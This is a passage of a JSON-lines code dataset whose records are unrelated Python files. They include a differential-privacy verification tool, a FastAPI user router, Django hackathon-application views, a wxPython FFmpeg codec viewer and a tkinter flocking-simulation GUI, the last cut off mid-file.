d2hist)\n            print(\"Probability of D2 Histogram\\n\", py)\n            print(\"D2 Lower\\n\", d2lower)\n            print(\"D2 Upper\\n\", d2histupperbound)\n            print(\"D2 Histogram to bound D1\\n\", d2histbound)\n            print(\"Comparison - D2 bound to D1\\n\", np.greater(d1hist, np.zeros(d1hist.size)), np.logical_and(np.greater(d1hist, np.zeros(d1hist.size)), np.greater(d1lower, d2histupperbound)))\n            print(\"Comparison - D1 bound to D2\\n\", np.greater(d2hist, np.zeros(d2hist.size)), np.logical_and(np.greater(d2hist, np.zeros(d2hist.size)), np.greater(d2lower, d1histupperbound)))\n\n        # Check if any of the bounds across the bins violate the relaxed DP condition\n        bound_exceeded = np.any(np.logical_and(np.greater(d1hist, np.zeros(d1hist.size)), np.greater(d1lower, d2histupperbound))) or \\\n            np.any(np.logical_and(np.greater(d2hist, np.zeros(d2hist.size)), np.greater(d2lower, d1histupperbound)))\n        return not bound_exceeded, d1histupperbound, d2histupperbound, d1lower, d2lower\n\n    # K-S Two sample test between the repeated query results on neighboring datasets\n    def ks_test(self, fD1, fD2):\n        return stats.ks_2samp(fD1, fD2)\n\n    # Anderson Darling Test\n    def anderson_ksamp(self, fD1, fD2):\n        return stats.anderson_ksamp([fD1, fD2])\n\n    # Kullback-Leibler divergence D(P || Q) for discrete distributions\n    def kl_divergence(self, p, q):\n        return np.sum(np.where(p != 0, p * np.log(p / q), 0))\n\n    # Wasserstein Distance\n    def wasserstein_distance(self, d1hist, d2hist):\n        return stats.wasserstein_distance(d1hist, d2hist)\n\n    # Verification of SQL aggregation mechanisms\n    def aggtest(self, f, colname, numbins=0, binsize=\"auto\", debug=False, plot=True, bound=True, exact=False):\n        d1, d2, d1_yaml_path, d2_yaml_path = self.generate_neighbors()\n        \n        fD1, fD2 = self.apply_aggregation_neighbors(f, (d1, colname), (d2, colname))\n        d1size, d2size = fD1.size, fD2.size\n\n        ks_res = self.ks_test(fD1, fD2)\n        print(\"\\nKS 2-sample Test Result: \", ks_res, \"\\n\")\n        \n        #anderson_res = self.anderson_ksamp(fD1, fD2)\n        #print(\"Anderson 2-sample Test Result: \", anderson_res, \"\\n\")\n        \n        d1hist, d2hist, bin_edges = \\\n            self.generate_histogram_neighbors(fD1, fD2, numbins, binsize, exact=exact)\n        \n        #kl_res = self.kl_divergence(d1hist, d2hist)\n        #print(\"\\nKL-Divergence Test: \", kl_res, \"\\n\")\n\n        ws_res = 0.0\n        dp_res = False\n        if(exact):\n            print(\"Wasserstein Distance Test: \", ws_res, \"\\n\")\n            
print(\"DP Predicate Test:\", dp_res, \"\\n\")\n return dp_res, ks_res, ws_res\n \n ws_res = self.wasserstein_distance(d1hist, d2hist)\n dp_res, d1histupperbound, d2histupperbound, d1lower, d2lower = self.dp_test(d1hist, d2hist, bin_edges, d1size, d2size, debug, exact=exact)\n print(\"Wasserstein Distance Test: \", ws_res, \"\\n\")\n print(\"DP Predicate Test:\", dp_res, \"\\n\")\n \n if(plot):\n self.plot_histogram_neighbors(fD1, fD2, d1histupperbound, d2histupperbound, d1hist, d2hist, d1lower, d2lower, bin_edges, bound, exact)\n return dp_res, ks_res, ws_res\n\n def accuracy_test(self, fD, bounds, confidence=0.95):\n # Actual mean of aggregation function f on D1 is equal to sample mean\n n = fD.size\n lower_bound = bounds[0]\n upper_bound = bounds[1]\n print(\"Confidence Level: \", confidence*100, \"%\")\n print(\"Bounds: [\", lower_bound, \", \", upper_bound, \"]\")\n print(\"Mean of noisy responses:\", np.mean(fD))\n print(\"Mean of upper and lower bound:\", (lower_bound + upper_bound) / 2.0)\n lower_bound = [lower_bound] * n\n upper_bound = [upper_bound] * n\n within_bounds = np.sum(np.logical_and(np.greater_equal(fD, lower_bound), np.greater_equal(upper_bound, fD)))\n print(\"Count of times noisy result within bounds:\", within_bounds, \"/\", n)\n print(\"Count of times noisy result outside bounds:\", n - within_bounds, \"/\", n)\n return (within_bounds / n >= confidence)\n\n # Applying queries repeatedly against SQL-92 implementation of Differential Privacy by Burdock\n def dp_query_test(self, d1_query, d2_query, debug=False, plot=True, bound=True, exact=False, repeat_count=10000, confidence=0.95):\n ag = agg.Aggregation(t=1, repeat_count=repeat_count)\n d1, d2, d1_yaml_path, d2_yaml_path = self.generate_neighbors(load_csv=True)\n fD1, fD1_bounds = ag.run_agg_query(d1, d1_yaml_path, d1_query, confidence)\n fD2, fD2_bounds = ag.run_agg_query(d2, d2_yaml_path, d2_query, confidence)\n acc_res = self.accuracy_test(fD1, fD1_bounds, confidence)\n d1hist, d2hist, bin_edges = self.generate_histogram_neighbors(fD1, fD2, binsize=\"auto\")\n d1size, d2size = fD1.size, fD2.size\n dp_res, d1histupperbound, d2histupperbound, d1lower, d2lower = self.dp_test(d1hist, d2hist, bin_edges, d1size, d2size, debug)\n if(plot):\n self.plot_histogram_neighbors(fD1, fD2, d1histupperbound, d2histupperbound, d1hist, d2hist, d1lower, d2lower, bin_edges, bound, exact)\n return dp_res, acc_res\n\n # Main method listing all the DP verification steps\n def main(self):\n #ag = agg.Aggregation(t=1, repeat_count=10000)\n #dp_exact, ks_exact, ws_exact = dv.aggtest(ag.exact_count, 'UserId', binsize = \"unity\", bound = False, exact = True)\n #dp_buggy, ks_buggy, ws_buggy = dv.aggtest(ag.buggy_count, 'UserId', binsize=\"auto\", debug=False,bound = True)\n #dp_count, ks_count, ws_count = dv.aggtest(ag.dp_count, 'UserId', binsize=\"auto\", debug = False)\n #dp_sum, ks_sum, ws_sum = dv.aggtest(ag.dp_sum, 'Usage', binsize=\"auto\")\n #dp_mean, ks_mean, ws_mean = dv.aggtest(ag.dp_mean, 'Usage', binsize=\"auto\", debug=False, plot=False)\n #dp_var, ks_var, ws_var = dv.aggtest(ag.dp_var, 'Usage', binsize=\"auto\", debug=False)\n d1_query = \"SELECT SUM(Usage) AS TotalUsage FROM d1.d1\"\n d2_query = \"SELECT SUM(Usage) AS TotalUsage FROM d2.d2\"\n dp_res, acc_res = self.dp_query_test(d1_query, d2_query, plot=False, repeat_count=10000)\n return dp_res, acc_res\n\nif __name__ == \"__main__\":\n dv = DPVerification(dataset_size=10000)\n 
print(dv.main())","sub_path":"evaluation/DPVerification.py","file_name":"DPVerification.py","file_ext":"py","file_size_in_byte":16315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"634551013","text":"import pytest\nfrom firedrake import *\nfrom ufl.algorithms.ad import expand_derivatives\nfrom irksome import GaussLegendre, Dt, TimeStepper\n\n\ndef heat_inhomog(N, deg, butcher_tableau):\n dt = Constant(1.0 / N)\n t = Constant(0.0)\n\n msh = UnitSquareMesh(N, N)\n\n V = FunctionSpace(msh, \"CG\", 1)\n x, y = SpatialCoordinate(msh)\n\n uexact = t*(x+y)\n rhs = expand_derivatives(diff(uexact, t)) - div(grad(uexact))\n\n u = interpolate(uexact, V)\n\n v = TestFunction(V)\n F = inner(Dt(u), v)*dx + inner(grad(u), grad(v))*dx - inner(rhs, v)*dx\n\n bc = DirichletBC(V, uexact, \"on_boundary\")\n\n luparams = {\"mat_type\": \"aij\",\n \"snes_type\": \"ksponly\",\n \"ksp_type\": \"preonly\",\n \"pc_type\": \"lu\"}\n\n stepper = TimeStepper(F, butcher_tableau, t, dt, u, bcs=bc,\n solver_parameters=luparams)\n\n while (float(t) < 1.0):\n if (float(t) + float(dt) > 1.0):\n dt.assign(1.0 - float(t))\n stepper.advance()\n t.assign(float(t) + float(dt))\n\n return norm(u-uexact)\n\n\n@pytest.mark.parametrize(('deg', 'N', 'time_stages'),\n [(1, 2**j, i) for j in range(2, 4)\n for i in (1, 2)]\n + [(2, 2**j, i) for j in range(2, 4)\n for i in (2, 3)])\ndef test_inhomog_bc(deg, N, time_stages):\n error = heat_inhomog(N, deg, GaussLegendre(time_stages))\n assert abs(error) < 1e-10\n","sub_path":"tests/test_inhomogbc.py","file_name":"test_inhomogbc.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"91199310","text":"import uuid\n\nfrom typing import Dict\n\nfrom fastapi import APIRouter, HTTPException, Depends\n\nfrom ..database import DBSession, get_db\nfrom ..models import User\n\nrouter = APIRouter()\n\n@router.get(\n '/{username}',\n summary='Reads user',\n description='Reads User from username.',\n response_model=User,\n)\nasync def read_user(username: str, db: DBSession = Depends(get_db)):\n try:\n return db.read_user(username)\n except KeyError as exception:\n raise HTTPException(\n status_code=404,\n detail='User not found',\n ) from exception\n\n@router.post(\n '',\n summary='Creates a new user',\n description='Creates a new user and returns its username.',\n response_model=str,\n)\nasync def create_user(user: User, db: DBSession = Depends(get_db)):\n return db.create_user(user)\n\n@router.put(\n '/{username}',\n summary='Replaces a user',\n description='Replaces a user identified by its username.',\n)\nasync def replace_user(\n username: str,\n user: User,\n db: DBSession = Depends(get_db),\n):\n try:\n db.replace_user(username, user)\n except KeyError as exception:\n raise HTTPException(\n status_code=404,\n detail='User not found',\n ) from exception\n\n@router.patch(\n '/{username}',\n summary='Alters user',\n description='Alters a user identified by its username',\n)\nasync def alter_user(\n username: str,\n item: User,\n db: DBSession = Depends(get_db),\n):\n try:\n old_item = db.read_user(username)\n update_data = item.dict(exclude_unset=True)\n new_item = old_item.copy(update=update_data)\n db.replace_user(username, new_item)\n except KeyError as exception:\n raise HTTPException(\n status_code=404,\n detail='User not found',\n ) from exception\n\n@router.delete(\n '/{username}',\n summary='Deletes user',\n description='Deletes a user 
identified by its username',\n)\nasync def remove_user(username: str, db: DBSession = Depends(get_db)):\n try:\n db.remove_user(username)\n except KeyError as exception:\n raise HTTPException(\n status_code=404,\n detail='User not found',\n ) from exception\n\n\n@router.delete(\n '',\n summary='Deletes all users, use with caution',\n description='Deletes all users, use with caution',\n)\nasync def remove_all_users(db: DBSession = Depends(get_db)):\n db.remove_all_users()","sub_path":"tasklist/tasklist/routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367733719","text":"from django.urls import path, include\nfrom .import views\n\napp_name = \"download\"\nurlpatterns = [\n path('download/', views.download, name = \"download\"),\n path('download/upload/',views.upload_stw, name=\"upload_stw\"),\n path('download/soft_list/', views.soft_list, name=\"soft_stw\"),\n path('download/', views.delete_stw,name=\"delete_stw\"),\n# path(\"api/\", views.api_data, name=\"api_data\"),\n# path('change/', views.update_api_data, name=\"update_api_data\")\n]","sub_path":"register-master/register-master/soft_developers_ADC3-master/webdevelopmentstore/download/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"121556594","text":"from jinja2 import Environment, FileSystemLoader\nimport os\nimport json\nimport shutil\n\nwith open('data.json') as fobj:\n site_data = json.load(fobj)\n\nfile_loader = FileSystemLoader(\"template\")\nenv = Environment(loader=file_loader)\n\ntemplate = env.get_template('content.html').render(site_data)\n\npublic_dir = os.path.join(os.getcwd(),\"public\")\n\n#if path already exists, remove it before copying with copytree()\nif os.path.exists(public_dir):\n shutil.rmtree(public_dir)\nshutil.copytree(os.path.join(os.getcwd(),\"template/static\"), public_dir)\n\nwith open(os.path.join(public_dir,\"index.html\"),\"w\") as fobj:\n fobj.writelines(template)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324206471","text":"import requests\r\nimport json\r\n\r\n\r\ncovid_api_url = requests.get(\"https://api.covid19india.org/data.json\")\r\n\r\napi = json.loads(covid_api_url.content)\r\n\r\nstate_search = api[\"statewise\"]\r\n\r\n# a = str(input(\"enter\"))\r\n\r\n\r\ndef searchedData(state_name):\r\n\r\n for i in state_search:\r\n if i[\"state\"].lower() == state_name.lower():\r\n return i['active'], i['confirmed'], i['deaths'], i['recovered'], i['lastupdatedtime']\r\n\r\n\r\ndef indiacases():\r\n india = api[\"statewise\"][0]\r\n\r\n return india['active'], india['confirmed'], india['deaths'], india['recovered'], india['lastupdatedtime']\r\n","sub_path":"Covid Updater/telegramBot/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"466970700","text":"import os\nimport json\nimport random\nimport datetime\n\nimport phonenumbers\n\nfrom hackinit.settings import MEDIA_ROOT\nfrom hackinit.shortcuts import *\nfrom .models import *\n\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_http_methods\nfrom django.http import JsonResponse\nfrom 
django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.db import IntegrityError\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz0123456789\"\n\ndef random_string(length):\n ans = \"\"\n for i in range(length):\n ans += alphabet[random.randint(0, len(alphabet) - 1)]\n return ans\n\ndef valid_cellphone(cellphone):\n x = phonenumbers.parse(cellphone, \"CN\")\n return \"+%s%s\" % (x.country_code, x.national_number)\n\ndef valid_resume(path):\n if path == None:\n return None\n full_path = \"resume/\" + path\n if os.path.isfile(MEDIA_ROOT + full_path):\n return full_path\n else:\n raise Exception\n\ndef valid_user(email):\n return User.objects.get(username=email)\n\ndef valid_date(year, month, day):\n return datetime.date(year, month, day)\n\n@require_http_methods([\"POST\"])\ndef upload_application(request):\n try:\n body = json.loads(request.body)\n user = valid_user(body[\"email\"])\n name = body[\"name\"]\n gender = body[\"gender\"]\n birth_year = body[\"birth_year\"]\n birth_month = body[\"birth_month\"]\n birth_day = body[\"birth_day\"]\n birth = valid_date(birth_year, birth_month, birth_day)\n school = body[\"school\"]\n city = body[\"city\"]\n province = body[\"province\"]\n grade = body[\"grade\"]\n grade_other = body[\"grade_other\"] if grade == \"OTHR\" else None\n mobile = valid_cellphone(body[\"mobile\"])\n wechat = body.get(\"wechat\", None)\n linkedin = body.get(\"linkedin\", None)\n github = body.get(\"github\", None)\n devpost = body.get(\"devpost\", None)\n website = body.get(\"website\", None)\n skills = body[\"skills\"]\n other_skills = body.get(\"other_skills\", None)\n is_guru = body[\"is_guru\"]\n is_ca = body[\"is_ca\"]\n hackathon_experience = body[\"hackathon_experience\"]\n project = body[\"project\"]\n how_know_hackinit = body[\"how_know_hackinit\"]\n how_know_hackinit_other = body[\"how_know_hackinit_other\"] if how_know_hackinit == \"O\" else None\n\n if is_guru:\n help_experience = body[\"help_experience\"]\n resume = valid_resume(body[\"resume\"])\n why_interested_stem = None\n tech_issue = None\n else:\n why_interested_stem = body[\"why_interested_stem\"]\n tech_issue = body[\"tech_issue\"]\n resume = valid_resume(body.get(\"resume\", None))\n help_experience = None\n\n have_team = body[\"have_team\"]\n if have_team:\n number_member = body[\"number_member\"]\n captain_name = body[\"captain_name\"]\n captain_email = body[\"captain_email\"]\n members = body[\"members\"]\n assign_team = None\n else:\n assign_team = body[\"assign_team\"]\n number_member = None\n captain_name = None\n captain_email = None\n members = None\n except:\n return parameter_error\n\n try:\n app = ParticipantApplication.objects.create(\n user=user,\n name=name,\n gender=gender,\n birth=birth,\n school=school,\n city=city,\n province=province,\n grade=grade,\n grade_other=grade_other,\n mobile=mobile,\n wechat=wechat,\n linkedin=linkedin,\n github=github,\n devpost=devpost,\n website=website,\n other_skills=other_skills,\n is_guru=is_guru,\n is_ca=is_ca,\n hackathon_experience=hackathon_experience,\n project=project,\n help_experience=help_experience,\n how_know_hackinit=how_know_hackinit,\n how_know_hackinit_other=how_know_hackinit_other,\n why_interested_stem=why_interested_stem,\n tech_issue=tech_issue,\n resume=resume,\n have_team=have_team,\n assign_team=assign_team,\n number_member=number_member,\n captain_name=captain_name,\n captain_email=captain_email,\n members=members\n )\n for s in skills:\n skill, created = 
Skill.objects.get_or_create(skill=s)\n app.skills.add(skill)\n except (ValidationError, User.DoesNotExist, ValueError):\n return parameter_error\n except IntegrityError:\n return duplicate_error\n except:\n return server_error\n\n return JsonResponse({\n \"email\": user.email,\n \"status\": 200,\n \"message\": \"participant application submitted\"\n })\n\n@require_http_methods([\"POST\"])\ndef upload_resume(request):\n try:\n resume = request.FILES[\"resume\"]\n filename = resume.name\n except:\n return parameter_error\n\n filename = \"application_\" + random_string(20) + \"_\" + filename\n\n with open(MEDIA_ROOT + \"resume/\" + filename, \"wb+\") as f:\n for chunk in resume.chunks():\n f.write(chunk)\n\n return JsonResponse({\n \"filename\": filename,\n \"status\": 200,\n \"message\": \"resume uploaded\"\n })\n\n@require_http_methods([\"GET\"])\ndef check_application_exists(request):\n if request.user.is_authenticated():\n try:\n app = ParticipantApplication.objects.get(user=request.user)\n return JsonResponse({\n \"email\": request.user.email,\n \"message\": \"application found\"\n })\n except ParticipantApplication.DoesNotExist:\n return not_found_error\n except:\n return server_error\n else:\n return not_found_error\n\n@require_http_methods([\"GET\"])\ndef fetch_status(request):\n if request.user.is_authenticated():\n try:\n app = ParticipantApplication.objects.get(user=request.user)\n if app.status in [\"A\", \"W\", \"R\"] and not app.email_sent:\n status = \"P\"\n else:\n status = app.status\n return JsonResponse({\n \"email\": request.user.email,\n \"application_status\": status,\n \"reimbursement_cap\": app.reimbursement_cap,\n \"message\": \"application status found\"\n })\n except ParticipantApplication.DoesNotExist:\n return JsonResponse({\n \"email\": request.user.email,\n \"application_status\": \"N\",\n \"reimbursement_cap\": None,\n \"message\": \"application status found\"\n })\n except:\n return server_error\n else:\n return not_found_error\n\n@require_http_methods([\"GET\"])\ndef decline_invitation(request):\n if request.user.is_authenticated():\n try:\n app = ParticipantApplication.objects.get(user=request.user)\n ParticipantApplication.objects.filter(pk=app.pk).update(status=\"D\")\n return JsonResponse({\n \"email\": request.user.email,\n \"message\": \"invitation declined\"\n })\n except ParticipantApplication.DoesNotExist:\n return not_found_error\n except:\n return server_error\n else:\n return not_found_error\n","sub_path":"django/application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"471193731","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/gianluca/Pubblici/GIThub/MASTER/Videomass/videomass3/vdms_frames/ffmpeg_codecs.py\n# Compiled at: 2020-05-11 07:27:34\n# Size of source mod 2**32: 9701 bytes\nimport wx\n\nclass FFmpeg_Codecs(wx.MiniFrame):\n __doc__ = '\\n It shows a dialog box with a pretty kind of GUI to view\\n the formats available on FFmpeg\\n '\n\n def __init__(self, dict_decoders, OS, type_opt):\n \"\"\"\n with 'None' not depend from parent:\n wx.Dialog.__init__(self, None, style=wx.DEFAULT_DIALOG_STYLE)\n\n With parent, -1:\n wx.Dialog.__init__(self, parent, -1, style=wx.DEFAULT_DIALOG_STYLE)\n if close videomass also close parent window:\n \"\"\"\n if type_opt == '-encoders':\n cod = 
_('CODING ABILITY')\n colctrl = 'ORANGE'\n title = _('Videomass: FFmpeg encoders')\n else:\n cod = _('DECODING CAPABILITY')\n colctrl = 'SIENNA'\n title = _('Videomass: FFmpeg decoders')\n wx.MiniFrame.__init__(self, None)\n self.panel = wx.Panel(self, (wx.ID_ANY), style=(wx.TAB_TRAVERSAL))\n sizer_base = wx.BoxSizer(wx.VERTICAL)\n notebook = wx.Notebook(self.panel, wx.ID_ANY)\n sizer_base.Add(notebook, 1, wx.ALL | wx.EXPAND, 5)\n nb_panel_1 = wx.Panel(notebook, wx.ID_ANY)\n vid = wx.ListCtrl(nb_panel_1, (wx.ID_ANY), style=(wx.LC_REPORT | wx.SUNKEN_BORDER))\n sizer_tab1 = wx.BoxSizer(wx.VERTICAL)\n sizer_tab1.Add(vid, 1, wx.ALL | wx.EXPAND, 5)\n nb_panel_1.SetSizer(sizer_tab1)\n notebook.AddPage(nb_panel_1, _('Video'))\n nb_panel_2 = wx.Panel(notebook, wx.ID_ANY)\n aud = wx.ListCtrl(nb_panel_2, (wx.ID_ANY), style=(wx.LC_REPORT | wx.SUNKEN_BORDER))\n sizer_tab2 = wx.BoxSizer(wx.VERTICAL)\n sizer_tab2.Add(aud, 1, wx.ALL | wx.EXPAND, 5)\n nb_panel_2.SetSizer(sizer_tab2)\n notebook.AddPage(nb_panel_2, _('Audio'))\n nb_panel_3 = wx.Panel(notebook, wx.ID_ANY)\n sub = wx.ListCtrl(nb_panel_3, (wx.ID_ANY), style=(wx.LC_REPORT | wx.SUNKEN_BORDER))\n sizer_tab3 = wx.BoxSizer(wx.VERTICAL)\n sizer_tab3.Add(sub, 1, wx.ALL | wx.EXPAND, 5)\n nb_panel_3.SetSizer(sizer_tab3)\n notebook.AddPage(nb_panel_3, _('Subtitle'))\n stext = wx.StaticText(self.panel, wx.ID_ANY, '')\n sizer_base.Add(stext, 0, wx.ALL | wx.EXPAND, 5)\n button_close = wx.Button(self.panel, wx.ID_CLOSE, '')\n grid_buttons = wx.GridSizer(1, 1, 0, 0)\n grid_buttons.Add(button_close, 1, wx.ALL, 5)\n sizer_base.Add(grid_buttons, flag=(wx.ALIGN_RIGHT | wx.RIGHT), border=0)\n self.panel.SetSizerAndFit(sizer_base)\n self.Layout()\n self.SetTitle(title)\n self.SetMinSize((700, 500))\n vid.InsertColumn(0, 'codec', width=150)\n vid.InsertColumn(1, 'F', width=40)\n vid.InsertColumn(2, 'S', width=40)\n vid.InsertColumn(3, 'X', width=40)\n vid.InsertColumn(4, 'B', width=40)\n vid.InsertColumn(5, 'D', width=40)\n vid.InsertColumn(6, (_('description')), width=450)\n aud.InsertColumn(0, 'codec', width=150)\n aud.InsertColumn(1, 'F', width=40)\n aud.InsertColumn(2, 'S', width=40)\n aud.InsertColumn(3, 'X', width=40)\n aud.InsertColumn(4, 'B', width=40)\n aud.InsertColumn(5, 'D', width=40)\n aud.InsertColumn(6, (_('description')), width=450)\n sub.InsertColumn(0, 'codec', width=150)\n sub.InsertColumn(1, 'F', width=40)\n sub.InsertColumn(2, 'S', width=40)\n sub.InsertColumn(3, 'X', width=40)\n sub.InsertColumn(4, 'B', width=40)\n sub.InsertColumn(5, 'D', width=40)\n sub.InsertColumn(6, (_('description')), width=450)\n if OS == 'Darwin':\n vid.SetFont(wx.Font(12, wx.MODERN, wx.NORMAL, wx.NORMAL))\n aud.SetFont(wx.Font(12, wx.MODERN, wx.NORMAL, wx.NORMAL))\n sub.SetFont(wx.Font(12, wx.MODERN, wx.NORMAL, wx.NORMAL))\n stext.SetFont(wx.Font(11, wx.SWISS, wx.ITALIC, wx.NORMAL))\n else:\n vid.SetFont(wx.Font(9, wx.MODERN, wx.NORMAL, wx.NORMAL))\n aud.SetFont(wx.Font(9, wx.MODERN, wx.NORMAL, wx.NORMAL))\n sub.SetFont(wx.Font(9, wx.MODERN, wx.NORMAL, wx.NORMAL))\n stext.SetFont(wx.Font(8, wx.SWISS, wx.ITALIC, wx.NORMAL))\n leg = 'F = frame-level multithreading\\nS = slice-level multithreading\\nX = Codec is experimental\\nB = Supports draw_horiz_band\\nD = Supports direct rendering method 1'\n stext.SetLabel(leg)\n index = 0\n vcodlist = dict_decoders['Video']\n if not vcodlist:\n print('No ffmpeg codecs available')\n else:\n vid.InsertItem(index, cod)\n vid.SetItemBackgroundColour(index, colctrl)\n for a in vcodlist:\n index += 1\n vid.InsertItem(index, 
a[6:].split(' ')[1])\n                if 'F' in a[1]:\n                    vid.SetItem(index, 1, 'YES')\n                if 'S' in a[2]:\n                    vid.SetItem(index, 2, 'YES')\n                if 'X' in a[3]:\n                    vid.SetItem(index, 3, 'YES')\n                if 'B' in a[4]:\n                    vid.SetItem(index, 4, 'YES')\n                if 'D' in a[5]:\n                    vid.SetItem(index, 5, 'YES')\n                d = ' '.join(a.split()).split(None, 2)[2]\n                if len(d):\n                    vid.SetItem(index, 6, d)\n                else:\n                    vid.SetItem(index, 6, '')\n\n        index = 0\n        acodlist = dict_decoders['Audio']\n        if not acodlist:\n            print('No ffmpeg codecs available')\n        else:\n            aud.InsertItem(index, cod)\n            aud.SetItemBackgroundColour(index, colctrl)\n            for a in acodlist:\n                index += 1\n                aud.InsertItem(index, a[6:].split(' ')[1])\n                if 'F' in a[1]:\n                    aud.SetItem(index, 1, 'YES')\n                if 'S' in a[2]:\n                    aud.SetItem(index, 2, 'YES')\n                if 'X' in a[3]:\n                    aud.SetItem(index, 3, 'YES')\n                if 'B' in a[4]:\n                    aud.SetItem(index, 4, 'YES')\n                if 'D' in a[5]:\n                    aud.SetItem(index, 5, 'YES')\n                d = ' '.join(a.split()).split(None, 2)[2]\n                if len(d):\n                    aud.SetItem(index, 6, d)\n                else:\n                    aud.SetItem(index, 6, '')\n\n        index = 0\n        scodlist = dict_decoders['Subtitle']\n        if not scodlist:\n            print('No ffmpeg codecs available')\n        else:\n            sub.InsertItem(index, cod)\n            sub.SetItemBackgroundColour(index, colctrl)\n            for a in scodlist:\n                index += 1\n                sub.InsertItem(index, a[6:].split(' ')[1])\n                if 'F' in a[1]:\n                    sub.SetItem(index, 1, 'YES')\n                if 'S' in a[2]:\n                    sub.SetItem(index, 2, 'YES')\n                if 'X' in a[3]:\n                    sub.SetItem(index, 3, 'YES')\n                if 'B' in a[4]:\n                    sub.SetItem(index, 4, 'YES')\n                if 'D' in a[5]:\n                    sub.SetItem(index, 5, 'YES')\n                d = ' '.join(a.split()).split(None, 2)[2]\n                if len(d):\n                    sub.SetItem(index, 6, d)\n                else:\n                    sub.SetItem(index, 6, '')\n\n        self.Bind(wx.EVT_BUTTON, self.on_close, button_close)\n        self.Bind(wx.EVT_CLOSE, self.on_close)\n\n    def on_close(self, event):\n        self.Destroy()","sub_path":"pycfiles/videomass-2.1.7-py3-none-any/ffmpeg_codecs.cpython-37.py","file_name":"ffmpeg_codecs.cpython-37.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"555193945","text":"import tkinter as tk\nfrom client.agent_trait_scale import AgentTraitScale\nfrom agents.flock_agent import FlockAgent\nfrom agents.lighthouse_agent import LighthouseAgent\nfrom agents.green_lighthouse import GreenLighthouse\nfrom agents.red_lighthouse import RedLighthouse\nfrom random import random\nimport numpy as np\n\nclass GUI(tk.Tk):\n\tdef __init__(self, context, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\n\t\t# variables\n\t\tself.context = context\n\t\tself.sim_width = context.width #px\n\n\t\tself.fps = tk.IntVar(self, 30)\n\t\tself.__running = None\n\t\tself.__id_auto_render = None\n\n\t\tself.__sim_running = False\n\t\tself.__id_auto_sim = None\n\t\tself.tps = 20\n\n\t\tself.fpop = tk.IntVar(self, 40)\n\t\tself.lhpop = tk.IntVar(self, 0)\n\n\t\t# frames\n\t\tsettings_frame = tk.Frame(self, padx=15)\n\t\tsettings_frame.grid(row=0, column=0)\n\t\tflock_settings_frame = tk.LabelFrame(settings_frame, text=\"flock settings\")\n\t\tflock_settings_frame.grid(row=0, column=0)\n\t\tlh_settings_frame = tk.LabelFrame(settings_frame, text=\"lighthouse settings\")\n\t\tlh_settings_frame.grid(row=0, column=1)\n\t\tfield_frame = tk.Frame(self, padx=15)\n\t\tfield_frame.grid(row=0, column=2)\n\t\tcontrol_frame = tk.Frame(field_frame, pady=7)\n\n\t\t# all setting scales\n\t\tself.flock_settings = [\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"nimbus\",\n\t\t\t\tfrom_=0, to=200, tickinterval=50, 
orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=10, variable=tk.DoubleVar(self, 100)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"focus\",\n\t\t\t\tfrom_=0, to=200, tickinterval=50, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=10, variable=tk.DoubleVar(self, 50)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"avoidance_distance\",\n\t\t\t\tfrom_=0, to=200, tickinterval=50, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=10, variable=tk.DoubleVar(self, 20)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"alignment_strength\",\n\t\t\t\tfrom_=0, to=1, tickinterval=0.5, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=0.1, variable=tk.DoubleVar(self, 0.5)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"cohesion_strength\",\n\t\t\t\tfrom_=0, to=1, tickinterval=0.5, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=0.1, variable=tk.DoubleVar(self, 0.3)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"avoidance_strength\",\n\t\t\t\tfrom_=0, to=1, tickinterval=0.5, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=0.1, variable=tk.DoubleVar(self, 0.4)),\n\t\tAgentTraitScale(flock_settings_frame, context, FlockAgent, \"rotation_speed\",\n\t\t\t\tfrom_=0, to=3, tickinterval=0.5, orient=tk.HORIZONTAL,\n\t\t\t\tlength=self.sim_width//2, resolution=0.1, variable=tk.DoubleVar(self, 0.7))\n\t\t]\n\t\tfor scale in self.flock_settings:\n\t\t\tscale.pack()\n\n\t\t#lighthouse settings\n\t\tself.lh_settings = [\n\t\t\tAgentTraitScale(lh_settings_frame, context, LighthouseAgent, \"nimbus\",\n\t\t\t\t\t\t\tfrom_=0, to=200, tickinterval=50, 